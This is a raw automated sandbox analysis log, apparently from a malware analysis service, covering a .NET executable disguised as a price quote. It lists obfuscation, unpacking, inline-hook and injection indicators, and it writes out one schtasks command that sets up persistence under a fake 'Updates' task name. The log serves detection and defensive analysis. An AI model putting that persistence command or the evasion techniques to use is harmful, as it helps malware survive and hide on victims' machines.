Source: 11.2.ySqETqNvdTbE.exe.2d640f4.1.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.ySqETqNvdTbE.exe.2d640f4.1.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.ySqETqNvdTbE.exe.2d81bb8.0.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cmstp.pdbGCTL source: ySqETqNvdTbE.exe, 0000000F.00000002.1588807654.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000F.00000002.1589033021.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000011.00000002.3879045777.0000000000A10000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: UGGs.pdbSHA256 source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr
Source:	Binary string: wntdll.pdbUGP source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1590106412.000000000476C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1588477475.00000000045BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: UGGs.pdb source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr
Source:	Binary string: wntdll.pdb source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000011.00000003.1590106412.000000000476C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1588477475.00000000045BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: ySqETqNvdTbE.exe, 0000000F.00000002.1588807654.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000F.00000002.1589033021.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000011.00000002.3879045777.0000000000A10000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c34184.0.raw.unpack, Mn.cs	.Net Code: jB
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c34184.0.raw.unpack, Mn.cs	.Net Code: JY System.AppDomain.Load(byte[])
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5800000.4.raw.unpack, Mn.cs	.Net Code: jB
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5800000.4.raw.unpack, Mn.cs	.Net Code: JY System.AppDomain.Load(byte[])
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	.Net Code: MhtUx5Fb7t System.Reflection.Assembly.Load(byte[])
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	.Net Code: MhtUx5Fb7t System.Reflection.Assembly.Load(byte[])
Source: 11.2.ySqETqNvdTbE.exe.2d640f4.1.raw.unpack, Mn.cs	.Net Code: jB
Source: 11.2.ySqETqNvdTbE.exe.2d640f4.1.raw.unpack, Mn.cs	.Net Code: JY System.AppDomain.Load(byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c34184.0.raw.unpack, Wc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5800000.4.raw.unpack, Wc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5760000.3.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c51c54.1.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.ySqETqNvdTbE.exe.2d640f4.1.raw.unpack, Wc.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.ySqETqNvdTbE.exe.2d81bb8.0.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E3E03 push esp; ret	1_2_072E3E04
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E324F push cs; iretd	1_2_072E3256
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00417B2F push ecx; iretd	10_2_00417B34
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D475 push eax; ret	10_2_0041D4C8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00415406 push ebp; iretd	10_2_00415408
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D4C2 push eax; ret	10_2_0041D4C8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D4CB push eax; ret	10_2_0041D532
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D52C push eax; ret	10_2_0041D532
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A1225F pushad ; ret	10_2_01A127F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A127FA pushad ; ret	10_2_01A127F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A409AD push ecx; mov dword ptr [esp], ecx	10_2_01A409B6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A1283D push eax; iretd	10_2_01A12858
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A11200 push eax; iretd	10_2_01A11369
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_07393E03 push esp; ret	11_2_07393E04
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0739324F push cs; iretd	11_2_07393256
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019609AD push ecx; mov dword ptr [esp], ecx	15_2_019609B6
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01931368 push eax; iretd	15_2_01931369
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01931FEC push eax; iretd	15_2_01931FED
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019B7E99 push ecx; ret	15_2_019B7EAC
Source: C:\Windows\explorer.exe	Code function: 16_2_100060DB pushad ; retf	16_2_100060DC
Source: C:\Windows\explorer.exe	Code function: 16_2_100039B5 push esp; retn 0000h	16_2_10003AE7
Source: C:\Windows\explorer.exe	Code function: 16_2_10003B02 push esp; retn 0000h	16_2_10003B03
Source: C:\Windows\explorer.exe	Code function: 16_2_10003B1E push esp; retn 0000h	16_2_10003B1F
Source: C:\Windows\explorer.exe	Code function: 16_2_101780DB pushad ; retf	16_2_101780DC
Source: C:\Windows\explorer.exe	Code function: 16_2_10175B1E push esp; retn 0000h	16_2_10175B1F
Source: C:\Windows\explorer.exe	Code function: 16_2_10175B02 push esp; retn 0000h	16_2_10175B03
Source: C:\Windows\explorer.exe	Code function: 16_2_101759B5 push esp; retn 0000h	16_2_10175AE7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049227FA pushad ; ret	17_2_049227F9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0492225F pushad ; ret	17_2_049227F9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0492283D push eax; iretd	17_2_04922858
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049509AD push ecx; mov dword ptr [esp], ecx	17_2_049509B6

Source: initial sample	Static PE information: section name: .text entropy: 7.947837143423425
Source: initial sample	Static PE information: section name: .text entropy: 7.947837143423425

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, J1G5GKwvdjKvf8OQeC.cs	High entropy of concatenated method names: 'CsCM1jcr14', 'jvvM8Sk4ya', 'erPM9O6XZa', 'ySoM30xwoJ', 'jnqMlYbuDE', 'MAyMRvP4Pd', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QDnNKncGrDPuDrEoDR.cs	High entropy of concatenated method names: 'LTgeiGKv31', 'PXoeWu8KWf', 'UIweUvNoyd', 'iTReohnfXi', 'CsRebFOPeB', 'RJZeaELUL5', 'i8eekc7gaN', 'EnBMmXa9gy', 'ryVMgknvNc', 'a6LM0vdJvH'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, YMDDDBbFrElleM13jG.cs	High entropy of concatenated method names: 'f7WSgEkV10', 'AWvS7AaDrm', 'rFdMdwyShH', 'JsYMifd48S', 'n5bSI7rIax', 'bONSNkOXx5', 'MZjSvpqQef', 'o8gSlJ3Uxu', 'cjpSr7R0GM', 'U0ISK1QUXF'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, VUgmPgOslxmMd5eww8Q.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uypLlN8t9l', 'Gc2LrdwShv', 'x3nLK4B6YW', 'eTELHfPVdq', 'BPmLf7WoZX', 'tl9LCiaiAm', 'qknLmqevGV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, jqAVqu20xu22mWTJL3.cs	High entropy of concatenated method names: 'xv8blG5NQl', 'rfpbrdlfrP', 'u3ZbKtH3qD', 'L9cbHKeYhd', 'bH0bfyypcS', 'L99bCo8WEG', 'Q6MbmxhNHT', 'wK7bgIRgDM', 'OnOb0qlVNo', 'x7Ub7R7P5C'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, hUUwlWB79KulPP4ZUV.cs	High entropy of concatenated method names: 'uiMMoge17M', 'DsHMbwmd2U', 'YRaMpkvbds', 'DnJMaLB4Nv', 'JP3MkDoBXG', 'X8jMT5lTmV', 'ESyMGdQQa0', 'IkwMnPX4Zj', 'XqcMBUNabH', 'YVDM5QpWF6'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, xoSNwQ0gg0xajEnSYr.cs	High entropy of concatenated method names: 'yfLxoUgPe', 'PcdOCeORD', 'H39q8dkeR', 'MQouJRhHr', 'MkLEYhHFE', 'ko9FFbnue', 'cljiZ5EyGgUUjJ8wFR', 'UKpeeiuifnVAFTn3lD', 'bEjM7N0ne', 'RSiLWwGrn'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, rIk3V3XGOnc6ynh1O3.cs	High entropy of concatenated method names: 'XN2aQMDPLa', 'KENauPMlrk', 'AsVp964NVP', 'iOwp3caEdR', 'PHxpRgtcXq', 'E5rpJPSYet', 'YyepZPbPsq', 'QWmpYs0sWw', 'WwbpVflddN', 'CJhpXylqLi'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, FJRyphWkihMBVIEIo1.cs	High entropy of concatenated method names: 'dULkAuyrjC', 'U8Rkbku5dg', 'LeqkapsqIA', 'fXbkTxH9fn', 'bAwkGa91g0', 'RSFafLpLsT', 'FVhaCRYS53', 'yjLamtS4CP', 'fbPagEsZId', 'AtXa0vbO4h'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, sbd7HiOJOYLom7v0EqR.cs	High entropy of concatenated method names: 'W6pe6pMvHe', 'FPke43BfH5', 'zruexCuL5j', 'LMveOLAK9n', 'hxReQHa1ed', 'htqeqHEaTE', 'Ko9eurapT4', 'WlReDQKR9x', 'pqTeEJ5iQv', 'mxveFdcbuV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, kwiEZYiO4ErDji8c4r.cs	High entropy of concatenated method names: 'Of6T6AMj9k', 'rYdT4PmvKc', 'Fo9TxbC4oi', 'rGkTOEt7CK', 'urdTQZjQFu', 'MonTqkHROY', 'kUATuSZT02', 'DKmTDja7QB', 'YFyTEK6KjX', 'U6XTF1IZRB'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, w8ar61jBjjm6at3nob.cs	High entropy of concatenated method names: 'xRipOP4Pdb', 'CqIpq5EVkP', 'gw1pDQbO46', 'ryapEah0Ws', 'wh2pyXH0U6', 'YbEphGLY12', 'neNpSBmg0X', 'g6UpM0JGnx', 'ItipelCgLx', 'IprpLfhjry'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, oHxIBizjG4LRBGNmTW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfHej98Aad', 'm7veyfEqux', 'wb1ehPrqUf', 'WmFeSbk4As', 'enteMnrc9p', 'RM4eeHjkhL', 'hxgeLPAfiQ'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, S8yjPIHLSLAEgWMQ3X.cs	High entropy of concatenated method names: 'Dispose', 'xNBi0hWa76', 'Avxt81oe2i', 'cyf22eGcbp', 'ia7i7qAv8a', 'a91iz3vB6D', 'ProcessDialogKey', 'MKktdJ9VLt', 'nEotit2Pfn', 'DQhttxTrfo'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, GqTFsaeq7shCibPVJH.cs	High entropy of concatenated method names: 'qNgiTHsJVV', 'KZaiGi1AlK', 'WTliB1WliA', 'Ukpi54EhYm', 'FHtiyTORKK', 'DeDihKPQFy', 'T8aHibCV6XGKZmOgvR', 'mXZLcgWFO6rmM8wkJ8', 'FWniibtZx9', 's76iWKL1gL'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, GRdgUjQRVB0nZ4deHD.cs	High entropy of concatenated method names: 'ToString', 'R9khItlThy', 'SjUh8DWXvC', 'VQTh9upkqj', 'K8Oh3vTqCB', 'yeBhR9JAoC', 'c5phJpkXFZ', 'Rw8hZ6ypVF', 'gvNhYHRXRS', 'hYmhV2v8rV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	High entropy of concatenated method names: 'i0WWAvY4TN', 'AGNWoor7Fn', 'UeiWbdnoaS', 'EAfWpx3xDV', 'u7jWaCXraf', 'AScWkoTd92', 'P9lWT3NDsI', 'OL5WGpPpr7', 'OG5WnGAfws', 'OSkWBhsALK'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, NxAR9IobBtVtUOi1Qy.cs	High entropy of concatenated method names: 'h5gjDvub8e', 'Vk6jEk29t3', 'dMtj1koclj', 'eJZj8HS9Xh', 'rTdj3mSDfv', 'clYjREhroq', 'Dw5jZcjVLg', 'jlbjYfwqsg', 'TKYjX7PcIl', 'OnnjI9oZSO'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5760000.3.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, J1G5GKwvdjKvf8OQeC.cs	High entropy of concatenated method names: 'CsCM1jcr14', 'jvvM8Sk4ya', 'erPM9O6XZa', 'ySoM30xwoJ', 'jnqMlYbuDE', 'MAyMRvP4Pd', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QDnNKncGrDPuDrEoDR.cs	High entropy of concatenated method names: 'LTgeiGKv31', 'PXoeWu8KWf', 'UIweUvNoyd', 'iTReohnfXi', 'CsRebFOPeB', 'RJZeaELUL5', 'i8eekc7gaN', 'EnBMmXa9gy', 'ryVMgknvNc', 'a6LM0vdJvH'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, YMDDDBbFrElleM13jG.cs	High entropy of concatenated method names: 'f7WSgEkV10', 'AWvS7AaDrm', 'rFdMdwyShH', 'JsYMifd48S', 'n5bSI7rIax', 'bONSNkOXx5', 'MZjSvpqQef', 'o8gSlJ3Uxu', 'cjpSr7R0GM', 'U0ISK1QUXF'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, VUgmPgOslxmMd5eww8Q.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uypLlN8t9l', 'Gc2LrdwShv', 'x3nLK4B6YW', 'eTELHfPVdq', 'BPmLf7WoZX', 'tl9LCiaiAm', 'qknLmqevGV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, jqAVqu20xu22mWTJL3.cs	High entropy of concatenated method names: 'xv8blG5NQl', 'rfpbrdlfrP', 'u3ZbKtH3qD', 'L9cbHKeYhd', 'bH0bfyypcS', 'L99bCo8WEG', 'Q6MbmxhNHT', 'wK7bgIRgDM', 'OnOb0qlVNo', 'x7Ub7R7P5C'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, hUUwlWB79KulPP4ZUV.cs	High entropy of concatenated method names: 'uiMMoge17M', 'DsHMbwmd2U', 'YRaMpkvbds', 'DnJMaLB4Nv', 'JP3MkDoBXG', 'X8jMT5lTmV', 'ESyMGdQQa0', 'IkwMnPX4Zj', 'XqcMBUNabH', 'YVDM5QpWF6'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, xoSNwQ0gg0xajEnSYr.cs	High entropy of concatenated method names: 'yfLxoUgPe', 'PcdOCeORD', 'H39q8dkeR', 'MQouJRhHr', 'MkLEYhHFE', 'ko9FFbnue', 'cljiZ5EyGgUUjJ8wFR', 'UKpeeiuifnVAFTn3lD', 'bEjM7N0ne', 'RSiLWwGrn'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, rIk3V3XGOnc6ynh1O3.cs	High entropy of concatenated method names: 'XN2aQMDPLa', 'KENauPMlrk', 'AsVp964NVP', 'iOwp3caEdR', 'PHxpRgtcXq', 'E5rpJPSYet', 'YyepZPbPsq', 'QWmpYs0sWw', 'WwbpVflddN', 'CJhpXylqLi'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, FJRyphWkihMBVIEIo1.cs	High entropy of concatenated method names: 'dULkAuyrjC', 'U8Rkbku5dg', 'LeqkapsqIA', 'fXbkTxH9fn', 'bAwkGa91g0', 'RSFafLpLsT', 'FVhaCRYS53', 'yjLamtS4CP', 'fbPagEsZId', 'AtXa0vbO4h'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, sbd7HiOJOYLom7v0EqR.cs	High entropy of concatenated method names: 'W6pe6pMvHe', 'FPke43BfH5', 'zruexCuL5j', 'LMveOLAK9n', 'hxReQHa1ed', 'htqeqHEaTE', 'Ko9eurapT4', 'WlReDQKR9x', 'pqTeEJ5iQv', 'mxveFdcbuV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, kwiEZYiO4ErDji8c4r.cs	High entropy of concatenated method names: 'Of6T6AMj9k', 'rYdT4PmvKc', 'Fo9TxbC4oi', 'rGkTOEt7CK', 'urdTQZjQFu', 'MonTqkHROY', 'kUATuSZT02', 'DKmTDja7QB', 'YFyTEK6KjX', 'U6XTF1IZRB'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, w8ar61jBjjm6at3nob.cs	High entropy of concatenated method names: 'xRipOP4Pdb', 'CqIpq5EVkP', 'gw1pDQbO46', 'ryapEah0Ws', 'wh2pyXH0U6', 'YbEphGLY12', 'neNpSBmg0X', 'g6UpM0JGnx', 'ItipelCgLx', 'IprpLfhjry'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, oHxIBizjG4LRBGNmTW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfHej98Aad', 'm7veyfEqux', 'wb1ehPrqUf', 'WmFeSbk4As', 'enteMnrc9p', 'RM4eeHjkhL', 'hxgeLPAfiQ'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, S8yjPIHLSLAEgWMQ3X.cs	High entropy of concatenated method names: 'Dispose', 'xNBi0hWa76', 'Avxt81oe2i', 'cyf22eGcbp', 'ia7i7qAv8a', 'a91iz3vB6D', 'ProcessDialogKey', 'MKktdJ9VLt', 'nEotit2Pfn', 'DQhttxTrfo'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, GqTFsaeq7shCibPVJH.cs	High entropy of concatenated method names: 'qNgiTHsJVV', 'KZaiGi1AlK', 'WTliB1WliA', 'Ukpi54EhYm', 'FHtiyTORKK', 'DeDihKPQFy', 'T8aHibCV6XGKZmOgvR', 'mXZLcgWFO6rmM8wkJ8', 'FWniibtZx9', 's76iWKL1gL'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, GRdgUjQRVB0nZ4deHD.cs	High entropy of concatenated method names: 'ToString', 'R9khItlThy', 'SjUh8DWXvC', 'VQTh9upkqj', 'K8Oh3vTqCB', 'yeBhR9JAoC', 'c5phJpkXFZ', 'Rw8hZ6ypVF', 'gvNhYHRXRS', 'hYmhV2v8rV'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	High entropy of concatenated method names: 'i0WWAvY4TN', 'AGNWoor7Fn', 'UeiWbdnoaS', 'EAfWpx3xDV', 'u7jWaCXraf', 'AScWkoTd92', 'P9lWT3NDsI', 'OL5WGpPpr7', 'OG5WnGAfws', 'OSkWBhsALK'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, NxAR9IobBtVtUOi1Qy.cs	High entropy of concatenated method names: 'h5gjDvub8e', 'Vk6jEk29t3', 'dMtj1koclj', 'eJZj8HS9Xh', 'rTdj3mSDfv', 'clYjREhroq', 'Dw5jZcjVLg', 'jlbjYfwqsg', 'TKYjX7PcIl', 'OnnjI9oZSO'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c51c54.1.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 11.2.ySqETqNvdTbE.exe.2d81bb8.0.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEB

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
